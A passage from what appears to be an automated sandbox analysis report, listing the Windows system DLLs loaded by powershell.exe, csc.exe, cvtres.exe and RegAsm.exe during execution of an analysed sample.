            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: version.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: mscoree.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptsp.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: rsaenh.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptbase.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptsp.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: rsaenh.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptbase.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: version.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: mscoree.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptsp.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: rsaenh.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptbase.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptsp.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: rsaenh.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptbase.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: version.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: mscoree.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptsp.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: rsaenh.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptbase.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: version.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: mscoree.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptsp.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: rsaenh.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptbase.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptsp.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: rsaenh.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptbase.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptsp.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: rsaenh.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptbase.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: webio.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: schannel.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mskeyprotect.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncryptsslp.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dpapi.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: webio.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: schannel.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mskeyprotect.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncryptsslp.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dpapi.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: version.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: mscoree.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptsp.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: rsaenh.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptbase.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptsp.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: rsaenh.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptbase.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dll
